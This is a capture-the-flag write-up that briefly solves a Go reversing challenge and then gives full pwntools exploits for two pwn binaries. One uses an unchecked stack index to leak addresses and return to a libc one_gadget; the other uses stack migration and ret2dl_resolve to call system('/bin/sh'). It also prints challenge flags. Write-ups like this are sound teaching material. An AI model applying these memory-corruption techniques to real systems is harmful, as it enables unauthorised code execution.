Use IDAGolangHelper to restore the function table.

Search for println to find the output.

Cross-reference back to main: the string goes through stringtoslicebyte, slicebytetostring and base64, and is then compared against the input.

The computed string can be found directly in memory; that is the flag.

Final flag: flag{92094daf-33c9-431e-a85a-8bfbd5df98ad}

PWN

your_pwn

Load it into IDA. main itself is fine, but in a function it calls there is a v1 with no bounds check, which is the exploitable bug.

Through this bug we can leak and modify the stack. Start writing the exploit. Since canary is on, first locate the return address (rbp + 8),

so we can leak the address of main+AC from the program, which gives the program base address.

```python
from pwn import *
# p is the pwntools tube to the challenge, set up earlier (process() or remote())

def hack(index, value):
    if value == 0:
        # read one stack byte at index, write it back unchanged, return its hex
        p.recvuntil('input index\n')
        p.sendline(str(index))
        p.recvuntil('now value(hex) ')
        result = p.recvline()[:-1]
        p.sendlineafter('input new value\n', str(int(result, 16)))
        return result[-2:]
    else:
        # overwrite the stack byte at index with value
        p.recvuntil('input index\n')
        p.sendline(str(index))
        p.recvuntil('now value(hex) ')
        result = int(p.recvline()[:-1], 16)
        p.sendlineafter('input new value\n', str(value))
        return result  # this return is never used, but it looks nice (O_O)
```

```python
# read the 8 bytes of the saved return address, most significant byte first
ret_addr = int(hack(0x15f, 0) + hack(0x15e, 0) + hack(0x15d, 0) + hack(0x15c, 0)
               + hack(0x15b, 0) + hack(0x15a, 0) + hack(0x159, 0) + hack(0x158, 0), 16)
elf.address = ret_addr - 0xb11
```

With the base address we can build the ROP chain.

For the pop|ret in the ROP chain, pick the pop that involves the fewest registers and does not touch rbp, so we chose 0xd03, right in the middle. Finding the pop;ret address with ROPgadget gives the function return address; then build puts(puts) to print the real address of puts with puts itself, which gives the libc base. (The libc version here: tried 2.27, then blindly guessed 2.23.) (Mind the iteration count along the way: once 0x28 iterations have passed, you have to enter 'yes' for the program to continue.)

```python
def hack_addr(index, addr):
    # write one 8-byte value onto the stack, one byte at a time
    base = 0x158 + index * 8
    hack(base, addr & 0xff)
    hack(base + 1, (addr >> 0x8) & 0xff)    # hack() is defined above; it is split
    hack(base + 2, (addr >> 0x10) & 0xff)   # out here to make the idea clearer
    hack(base + 3, (addr >> 0x18) & 0xff)
    hack(base + 4, (addr >> 0x20) & 0xff)
    hack(base + 5, (addr >> 0x28) & 0xff)
    hack(base + 6, (addr >> 0x30) & 0xff)
    hack(base + 7, (addr >> 0x38) & 0xff)
    return index + 1
```

```python
pop_ret = elf.address + 0xd03
puts_addr = elf.symbols['puts']
puts_got = elf.got['puts']
# chain: pop_ret ; puts@got ; puts ; ret_addr, written one qword at a time
hack_addr(hack_addr(hack_addr(hack_addr(0, pop_ret), puts_got), puts_addr), ret_addr)
hack(0, 0)
p.sendafter('do you want continue(yes/no)? \n', 'yes')
libc.address = u64(p.recvline()[:-1].ljust(8, '\x00')) - puts_addr
```

Finally, just run 33 idle iterations, then overwrite the return address with the one_gadget offset plus the libc base to get a shell. (The 33 idle runs are there to reach the 0x28 count so the loop ends.)

```python
hack_addr(0, libc.address + 0xf1147)   # return address -> one_gadget in libc
for i in range(33):                    # idle iterations to reach the 0x28 count
    hack(0, 0)
p.interactive()
```

Final exploit screenshot:

baby_pwn

Load it into IDA.

The program is dead simple: an obvious stack overflow, but no output.

checksec shows only NX, so it is almost certainly return-to-dl_resolve. Writing the exploit: first migrate the stack to the bss segment and return into the vuln function.

```python
# rop is a roputils ROP object; offset, readplt, vulFunc and addr_bss come from the binary
buf1 = 'A' * offset
buf1 += p32(readplt) + p32(vulFunc) + p32(0) + p32(addr_bss) + p32(100)
p.send(buf1)
```

代码语言:javascript
复制
buf1 += p32(readplt) + p32(vulFunc) + p32(0) + p32(addr_bss) + p32(100)
p.send(buf1)

Then call dl_resolve() and pad with fake data:

```python
buf2 = rop.string('/bin/sh')
buf2 += rop.fill(20, buf2)
buf2 += rop.dl_resolve_data(addr_bss + 20, 'system')
buf2 += rop.fill(100, buf2)
p.send(buf2)
```

Use dl_resolve_call to invoke system("/bin/sh") and get a shell:

```python
buf3 = 'A' * 44 + rop.dl_resolve_call(addr_bss + 20, addr_bss)
p.send(buf3)
```

Final exploit screenshot:

flag{b8313ecb06a0fd2742315678634161b5}

Originally published: 2019-04-24

Shared from the 恒星EDU WeChat official account.